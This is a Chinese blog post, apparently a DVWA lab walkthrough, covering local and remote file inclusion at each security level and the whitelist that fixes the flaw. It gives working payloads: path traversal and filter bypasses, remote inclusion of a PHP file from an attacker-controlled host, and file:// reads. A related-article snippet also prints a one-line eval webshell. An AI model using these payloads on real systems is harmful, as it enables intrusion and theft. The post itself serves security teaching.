dvwa中的文件包含攻击

已于 2023-01-13 14:36:47 修改
阅读量760 收藏 7
点赞数
文章标签: 文件包含漏洞 Powered by 金山文档
于 2023-01-13 14:34:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leiwuhen92/article/details/128673720
版权

环境:

dvwa: 192.168.11.135 dvwa版本: Version 1.9 (Release date: 2015-09-19)

kail机器:192.168.11.156

一、什么是文件包含漏洞?

为简化代码,会把重复的code内容单独写到一个页面文件,然后再需要调用重复内容的页面中使用include方法来包含重复代码的页面就可以了。

使用include方法可以让当前页面去执行指定的另外一个文件中的代码内容。若没有对这种行为做限制,那么黑客将很有可能让当前页面去执行超出 Web 目录中的文件或者是 Web 目录中不希望被执行的敏感文件,甚至是远程服务器上的文件。比如黑客使用 include 方法去调用 Linux 系统中的 /etc/passwd,就会在当前页面中显示系统中的用户信息;或者黑客自己搭建 Web 服务器,在自己的服务器上写一个 Webshell,然后通过 include 方法在目标页面中执行本地服务器中的 Webshell。

几乎所有的脚本语言中都提供文件包含的功能,但文件包含漏洞在php中居多,而在jsp\ASP\ASP.NETC程序中非常少,甚至没有文件包含漏洞的存在。

原理服务器解析执行php文件时能通过包含函数加载另外一个文件中的php代码,当被包含的文件中存在木马时,木马程序会在服务器上加载执行。

下面介绍php的四种文件包含函数

require():只要程序一运行就包含文件,找不到被包含的文件时会产生致命错误,并停止脚本
require_once():功能与require()相同区别在于当重复调用一个文件时,程序只调用一次
include():执行到include()函数时才包含文件,找不到被包含文件时只会产生警告,脚本将继续执行
include_once():功能和include()相同,区别当重复调用一个文件时,程序只调用一次
nighcight_file(),show_source()函数对文件进行语法高亮显示,通常能看到源代码
readfile(),file_get_contents()函数读取一个文件,并写入输出缓冲
fopen(),打开一个文件或者url

文件包含漏洞包括本地文件包含漏洞和远程文件包含漏洞:

  • 本地文件包含漏洞指的是包含本地的php文件;

  • 远程文件包含漏洞包含的是其它服务器上的php文件。需要满足两个条件在php.ini中。当php.ini中的配置选项allow_url_fopen:on allow_url_include:on,对方开启这两个配置时才可以使用

dvwa: 192.168.11.135 环境开启了:

二、演示dvwa上的文件包含漏洞

2.1、low级别

源码

1、安全级别设置为Low,点击 File Inclusion 按钮,进入文件包含攻击页面。页面中有 3 个文件链接:

点击后会读取出系统的相关信息,说明这 3 个文件内含有读取相关系统信息的脚本代码,被包含进当前页面执行了。

当前的 URL 显示了 http://192.168.11.135:81/vulnerabilities/fi/?page=后就是被包含的文件名 file3.php。

2、考虑到我们当前 Web 服务器(dvwa)是使用的 docker容器(Linux),把 URL 中的文件名替换为 /etc/hosts,发现可以通过绝对路径直接显示 hosts 文件中的内容:

3、使用相对路径 ../../phpinfo.php 来替换 URL 中的包含文件名,可以执行 DVWA 程序自带的 phpinfo 信息。当前目录是vulnerabilities/fi/,向上返回2层,就到了 /,所以 ../../phpinfo.php就是指 /phpinfo.php 这个文件

4、在kali攻击机上自行搭建一个 Web 服务(sudo service apache2 start),在 Web 根目录/var/www/html下写入一个 shell.php 文件(内容:<?php phpinfo();?>),用来显示 PHPINFO:

使用http://192.168.11.156/shell.php来替换原 URL 中包含的文件名,可以远程执行 PHP 脚本

2.2、medium级别

1、安全级别设置为 Medium,进入文件包含攻击页面,查看源码:

发现使用 str_replace() 函数把 http://、https://、../、..\ 替换为了空值,来防止远程文件包含和相对路径的文件包含。但是str_replace() 函数相当不安全,只做一次替换,比如在 http:// 中再嵌套一个 http:// 则可以绕过限制;另外,并没有对绝对路径的文件包含进行防护。

2、绝对路径与相对路径的文件包含攻击

使用绝对路径 /etc/hosts 的文件包含,不受任何影响:

使用相对路径 ../../phpinfo.php 进行文件包含不被允许:

使用相对路径进行文件包含不被允许,但可以通过在../中多嵌套一个../绕过,在 URL 中输入包含的文件名为..././..././phpinfo.php,可以成功执行:

3、使用远程文件包含,需要在 http:// 中多嵌套一个 http://,在 URL 中输入包含的文件名为htthttp://p://192.168.11.156/shell.php,可以成功执行:

2.3、High级别

1、安全级别设置为 High,进入文件包含攻击页面,查看源码:

发现使用 fnmatch() 函数来检查变量 page 值的开头必须是 file或者file是include.php文件,否则就不执行。

2、可以利用 file 协议来绕过防御。使用 file 协议可以来描述一个文件的绝对路径。我们这里在 URL 中输入包含的文件名为file:///etc/hosts,可以成功输出文件内容

2.4、Impossible级别

1、安全级别设置为 Impossible,进入文件包含攻击页面,查看源码:

发现使用了白名单机制,提交的 page 变量只能是include.php、file1.php,file2.php,file3.php这四个文件,否则就不执行,彻底杜绝了文件包含漏洞。

青霄
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA之命令注入,CSRF,文件包含漏洞攻击
m0_57116761的博客
08-18 593
命令注入 1. low(低级) 正常ping一个ip 然后发现后边可以输入空格 我们就可以尝试获取对方的用户名称 2.medium(级) 级会过滤掉“&&”和“;” 过滤只过滤一次,不会循环过滤 所以我们可以尝试在两个“&&”间加一个“;” 看来我们是成功了 也可以尝试只输入一个“&” 哦豁,老天在眷顾我们 3.high(高级) 高级过滤掉很多符号 但是“| ”管道符后边多了一个空格,所以我们来试试看 ”&a..
DVWA的压缩文件安装包下载
最新发布
09-30
了解如何正确处理文件包含函数可以防止这类攻击。 5. **认证与会话管理**:DVWA的"Authentication"和"Session Management"部分涵盖了弱密码策略、会话固定和会话劫持等问题。学习正确的身份验证和会话管理实践能...
【渗透测试-web安全】DVWA-文件包含
harry_c的博客
11-11 1210
【渗透测试-web安全】DVWA-文件包含基本概念基本配置等级选择进入界面文件配置重启服务漏洞利用进阶内容基本的构建思路服务端会过滤掉对应的字符信息防范 基本概念 其实之前的文章说过,文件包含是一种代码的处理方法,比如函数include、require等,参数是文件名 但是如果对应的参数能够被用户可控的话,黑客就能够利用,构造出危害系统的缺口。 基本配置 等级选择 首选选择DVWA的等级为Low ...
漏洞复现篇——文件包含漏洞(DVWA靶场---File Inclusion【低高级绕过】)
爱国小白帽
02-19 3868
实验环境: PHPstudy DVWA靶场 菜刀 环境搭建 1、将DVWA Security級別换成low 2、打开php的配置文件,搜索allow_url_include,把off换成on,然后重启 模拟实验 本地文件包含(LFI) 1、点击File Inclusion的file1.php 2、在图示位置输入C:\Windows\System32\drivers\etc\hosts...
DVWA---文件包含漏洞(亲测哦)
weixin_44034479的博客
07-07 893
Weak Session IDs 原理: 用户登陆后,在服务器端就会创建一个会话(Session),接着访问页面的时候就不用登陆,只需要携带Session去访问。SessionID作为特定用户访问站点所需的唯一内容。这样会被猜出来,从而获取访问权限,无需登录密码直接进入特定用户界面,进而进行其他操作。 低级 步骤 代码分析 用户的 last_session_id 不存在就设为 0,存在就直接在原来的基础上加1。容易被人伪造,而且不能保证每个人的session是不一样的,容易造成冲突。 低级别只是将co
dvwa File Inclusion(文件包含) 低高各个级别介绍及破解过程
weixin_44286136的博客
05-19 960
本地文件包含 http://192.168.0.8/dvwa/vulnerabilities/fi/?page=/etc/passwd 类似 本地文件包含+webshell 1.制作一句话木马 1234.jpg 推荐软件 edjpgcom <?fputs(fopen("shell.php","w"),'<?php eval($_POST[admin]);?>')?> 2.上传图片木马文件 3.执行文件包含 并产生后门 4.通过菜刀连接 ...
PHP及DVWA文件
07-28
4. Web安全概念,如SQL注入、XSS攻击文件包含漏洞等。 5. 如何进行安全编码,避免常见的Web应用安全漏洞。 6. 使用DVWA进行渗透测试的基本方法和步骤。 总之,这个压缩包为PHP初学者和Web安全专家提供了一个宝贵...
爆破dvwa网站的的数据库
08-28
DVWA(Damn Vulnerable Web Application)是一个用于安全培训和测试的开源Web应用程序,它包含了各种常见的安全漏洞,如SQL注入、跨站脚本(XSS)、文件包含等。在这个场景,我们将关注如何通过SQL注入攻击来爆破...
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
在实际文件包含漏洞的攻击是非常危险的,攻击者可以通过上传恶意文件来获取服务器的控制权,获取敏感数据,并对服务器进行恶意攻击。因此,我们务必要重视文件包含漏洞的防御,并采取相应的安全措施来防御文件...
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“”、“高”和“不可能”,每个级别都包含不同...
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为专业的安全人员提供一个合法的环境,来测试他们的工具和技能。帮助web开发人员理解web应用保护的过程,还可以在课堂为师生的安全性教学提供便利。DVWA是一个RandomStorm开源项目,了解更多关于RandomStorm开源项目可以访问 http://www.randomstorm.com。DVWA项目开始于2008年12月,并逐渐受到欢迎。 现在,全世界有成千上万的安全专业人员,学生和教师正在使用它。 DVWA现在已包含在流行的渗透测试Linux发行版,例如Samurai的Web测试框架等。
DVWA—【文件包含漏洞】实验详解
weixin_52620919的博客
08-26 1553
LOW 实验关键代码 <?php $file = $_GET ['page'];//The page we wish to display ?> 这是一个典型的在动态网页的用法,就像注我上一篇文章【文件包含漏洞原理】所讲,写入我们想要显示的页面。这里就是对用户的输入完全信任,因此就导致可以包含任意页面。 程序员在写程序的时候要站在不安全的角度上,而不是用户的角度上,这是从网站安全的角度来说。 实验: 接下来通过文件包含漏洞,查看位于根目录下的1.txt文件的内容,同过这两个实验对比总结远
DVWA环境实战测试 “文件包含”漏洞(步骤详细)
qq_40529133的博客
03-30 4826
文件包含漏洞 概念 文件包含其实是一种代码的处理方法,函数如include,require等 参数是文件名。当一个代码文件想要引用另一个代码文件时就要用到包含。 *文件包含漏洞: 如果文件包含漏洞的参数可控且过滤不严,就会被攻击者“偷梁换柱”,直接引用恶意代码达到代码执行的目的 准备实战环境 进入DVWA界面 我们先把安全等级调成low等级, 进入File inclusion 模块 在这里我们要...
文件包含上传漏洞&目录遍历命令执行漏洞
hackzkaq的博客
01-18 1054
`搜索公众号:白帽子左一,每天更新技术干货! 作者:Deutsh 原文地址:https://www.freebuf.com/articles/web/246651.html 文件上传漏洞: 一句话木马 一句话木马主要由两部分组成:执行函数与 接收被执行代码的变量 执行函数: eval() assert() create_function() array_map() array_filter() call_user_func() call_user_func_array() eval() .
DVWA —— File Inclusion 文件包含
YouTheFreedom的博客
05-22 1579
web 程序引入一段用户能控制的脚本或代码,并让服务器端执行 include() 等函数通过动态变量的方式引入需要包含文件,用户能够控制该动态变量,实现本地文件包含或者远程文件包含
文件包含-DVWA练习
qq_63087425的博客
10-20 1162
首先,我们需要大概知道文件包含是什么,可能会产生哪些漏洞,如何利用这些漏洞看相关文章环境:win10+phpstudy。
DVWA——文件包含
小纯的博客
03-21 3150
File Inclusion学习文件包含简介实战:DVWA——文件包含 文件包含简介 一、文件包含简介: 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页的链接)。 二、文件包含函数: PHP文件包含函数有以下四种:require()、require_on
dvwa远程文件包含
09-26
远程文件包含DVWA的一个漏洞。远程文件包含漏洞允许攻击者通过传递恶意URL参数来包含远程文件,从而执行任意代码或获取敏感信息。 在DVWA,远程文件包含漏洞可以通过修改URL参数来利用。攻击者可以通过传递...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值